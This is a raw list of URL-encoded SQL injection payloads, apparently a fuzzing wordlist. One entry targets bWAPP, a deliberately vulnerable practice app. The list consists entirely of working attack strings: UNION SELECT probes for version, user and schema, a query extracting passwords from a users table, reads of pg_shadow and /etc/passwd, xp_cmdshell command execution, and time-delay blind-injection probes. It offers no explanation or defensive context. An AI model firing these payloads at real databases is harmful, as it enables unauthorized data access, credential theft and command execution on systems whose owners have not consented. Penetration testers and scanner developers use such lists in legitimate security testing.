0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,@@version,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,@@version,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,database(),10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,database(),10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,user(),10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,8,user(),10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,@@version,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,@@version,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,database(),9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,database(),9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,user(),9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,7,user(),9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,@@version,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,@@version,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,database(),8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,database(),8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,user(),8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,6,user(),8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,@@version,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,@@version,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,database(),7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,database(),7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,user(),7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,5,user(),7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,@@version,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,@@version,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,database(),6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,database(),6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,4,user(),6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,4,user(),6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,@@version,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,@@version,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,database(),5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,database(),5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,3,user(),5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,3,user(),5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,@@version,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,@@version,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,database(),4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,database(),4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,2,user(),4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,2,user(),4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,@@version,3
0'%20UNION%20SELECT%20ALL%201,@@version,3,4
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8,9--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7,8--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6,7--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5,6--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4,5--
0'%20UNION%20SELECT%20ALL%201,@@version,3,4--
0'%20UNION%20SELECT%20ALL%201,@@version,3--
0'%20UNION%20SELECT%20ALL%201,database(),3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,database(),3,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%201,table_name,2%20from%20information_schema.tables
0'%20UNION%20SELECT%20ALL%201,table_name,2%20from%20information_schema.tables--
0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4%20from%20information_schema.tables
0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4%20from%20information_schema.tables--
0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4,5%20from%20information_schema.tables
0'%20UNION%20SELECT%20ALL%201,table_name,2,3,4,5%20from%20information_schema.tables--
0'%20UNION%20SELECT%20ALL%201,user(),3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%201,user(),3,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%20@@version
0'%20UNION%20SELECT%20ALL%20@@version,2
0'%20UNION%20SELECT%20ALL%20@@version,2,3
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8.9
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7,8.9--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6,7--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5,6--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4,5--
0'%20UNION%20SELECT%20ALL%20@@version,2,3,4--
0'%20UNION%20SELECT%20ALL%20@@version,2,3--
0'%20UNION%20SELECT%20ALL%20@@version,2--
0'%20UNION%20SELECT%20ALL%20@@version--
0'%20UNION%20SELECT%20ALL%20database()
0'%20UNION%20SELECT%20ALL%20database(),2,3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%20database(),2,3,4,5,6,7,8,9,10--
0'%20UNION%20SELECT%20ALL%20database()--
0'%20UNION%20SELECT%20ALL%20table_name,2%20from%20information_schema.tables
0'%20UNION%20SELECT%20ALL%20table_name,2%20from%20information_schema.tables--
0'%20UNION%20SELECT%20ALL%20table_name,2,3%20from%20information_schema.tables
0'%20UNION%20SELECT%20ALL%20table_name,2,3%20from%20information_schema.tables--
0'%20UNION%20SELECT%20ALL%20user(),2,3,4,5,6,7,8,9,10
0'%20UNION%20SELECT%20ALL%20user(),2,3,4,5,6,7,8,9,10--
1
1%20and%201=1
1%20and%20user_name()%20=%20'dbo'
1%20exec%20sp_%20(or%20exec%20xp_)
1%20or%201=1
1%20uni/**/on%20select%20all%20from%20where
1%20union%20all%20select%201,2,3,4,5,6,name%20from%20sysobjects%20where%20xtype%20=%20'u'%20--
1'%20and%201=(select%20count(*)%20from%20tablenames);%20--
1'%20and%20non_existant_table%20=%20'1
1'%20or%20'1'='1
1'1
1\'1
\';%20desc%20users;%20--
\\backupdb.dat'>BACKUP%20database%20master%20to%20disks='\\\\backupdb.dat'
and%200=benchmark(3000000,MD5(1))%20%23
and%200=benchmark(3000000,MD5(1))%20--
and%200=benchmark(3000000,MD5(1))%20/*
copy%20myfile%20from%20'/etc/passwd';
create%20table%20myfile%20(input%20TEXT);
create%20table%20myfile%20(line%20varchar(8000))"%20bulk%20insert%20foo%20from%20'c:\inetpub\wwwroot\auth.aspâ'"%20select%20*%20from%20myfile"--
exec%20master..xp_cmdshell%20'ipconfig+/all'
exec%20master..xp_cmdshell%20'net+users'
exec%20master..xp_cmdshell%20'net+view'
hello%20world',(select%20*%20from%20bWAPP.users%20where%20id=1%20limit%200,1))
hello%20world',(select%20*%20from%20bWAPP.users%20where%20id=1%20limit%200,1))--
hello%20world',(select%20*%20from%20databases()%20where%20id=1%20limit%200,1))
hello%20world',(select%20*%20from%20databases()%20where%20id=1%20limit%200,1))--
hello%20world',(select%20@@datadir))
hello%20world',(select%20@@datadir))--
hello%20world',(select%20@@version))
hello%20world',(select%20@@version))--
hello%20world',(select%20databases()))
hello%20world',(select%20databases()))--
hello%20world',(select%20password%20from%20bWAPP.users%20where%20id=1%20limit%200,1))
hello%20world',(select%20password%20from%20bWAPP.users%20where%20id=1%20limit%200,1))--
hello%20world',(select%20system_user())
hello%20world',(select%20system_user())--
hello%20world',(select%20user()))
hello%20world',(select%20user()))--
select%20*%20from%20master..sysserverse
select%20*%20from%20myfile;copy%20myfile%20to%20/tmp/test;
select%20*%20from%20pg_group;
select%20*%20from%20pg_shadow;
select%20*%20from%20sysusers
select%20@@microsoftversione
select%20@@servernamee
select%20@@version
select%20current_database();
select%20current_setting('config_file');
select%20current_setting('data_directory');
select%20current_setting('hba_file');
select%20current_setting('krb_server_keyfile');
select%20current_setting('log_connections');
select%20current_setting('log_statement');
select%20current_setting('password_encryption');
select%20current_setting('port');
select%20current_setting('virtual_host');
select%20current_user;
select%20session_user;
select%20version();
waitfor%20delay%20'0:0:20'%20--
waitfor%20delay%20'0:0:20'%20/*
﻿'%20or%201=1%20
﻿'%20or%201=1%20--
﻿';%20exec%20master..xp_cmdshell%20'ping%2010.10.1.2'--